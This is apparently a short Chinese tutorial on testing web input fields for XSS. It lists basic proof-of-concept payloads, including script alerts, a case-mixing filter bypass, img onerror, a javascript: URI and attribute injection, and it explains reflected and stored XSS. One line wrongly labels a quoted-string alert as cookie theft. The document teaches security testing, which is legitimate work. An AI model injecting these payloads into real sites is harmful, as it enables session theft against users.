探测XSS漏洞方法

一. 登陆页面

二. 在输入框直接输入对应脚本攻击(通用)

  1. 简单弹框:

<script>alert('XSS')</script>

  1. 过滤了大小:

<ScRiPt>AlErt('XSS')</ScRiPt>

  1. 对 img 标签 进行绕过

<img src="#" onerror=alert("XSS")>

  1. 使用 Javascript 的尾协议的脚本

javascript:alert('xss')

  1. 利用 href 属性值来进行xss

' onclick=' alert("xss")

三. 反射型XSS攻击

1)反射型(xss)

反射型(xss):XSS代码常常出现在URL请求中,当用户访问带有XSS代码的URL请求时,服务器端接收请求并处理,然后将带有XSS代码的数据返回给浏览器,浏览器解析该段带有XSS代码的数据并执行,整个过程就像一次反射,故称为反射型XSS.

(1)<script>alert('反射型(xss)')</script> //简单弹框

(2)<ScRiPt>AlErt('反射型(xss)')</ScRiPt> //过滤了大小

(3)<script>alert('document.cookie')</script> //窃取用户 Cookie

四. 存储型XSS攻击

2)存储型(xss)

存储型(xss):攻击的特点是提交的恶意内容会被永久存储,因而一个单独的恶意代码就会使多个用户受害,故被称为持久性XSS.-----一般场景在留言板输入框等

相关推荐
子非鱼a6 小时前
【XSS】乌托邦·王的实验室
html·xss
updayday8546 小时前
离职域账号状态变更与Ping64操作记录核对
大数据·网络·数据库·安全·智能路由器
jimmyleeee9 小时前
大模型安全之二十二:AI 安全实践:真实案例研究与经验教训
人工智能·安全
咖啡星人k10 小时前
给 AI 接工具的权限设计:账号、Key、参数三层
安全·mcp·权限设计
子非鱼a10 小时前
【XSS】这个知识库你需要申请
xss
jimmyleeee11 小时前
大模型安全之二十八:Agent 权限与策略控制:从最小权限到多层监督
人工智能·安全
hasty11 小时前
一封邮件如何跨越三层边界拿到 root?Cisco Secure Email Gateway CVE-2026-76461 深度解析
安全·安全威胁分析·代码复审
是隼人12 小时前
buuctf-pwn ciscn_2019_sw_1(32位只有一次格式化机会)题解(学习过程持续更新)
c语言·学习·安全·pwn入门·ctf入门
蒲公英eric12 小时前
DVWA通关全记录:从漏洞复现到安全防御——总结篇
web安全·ai·dvwa·ai安全
三84412 小时前
云安全 · 06 · 云凭证 AK/SK 与元数据服务
安全·云安全·docker逃逸·ak/sk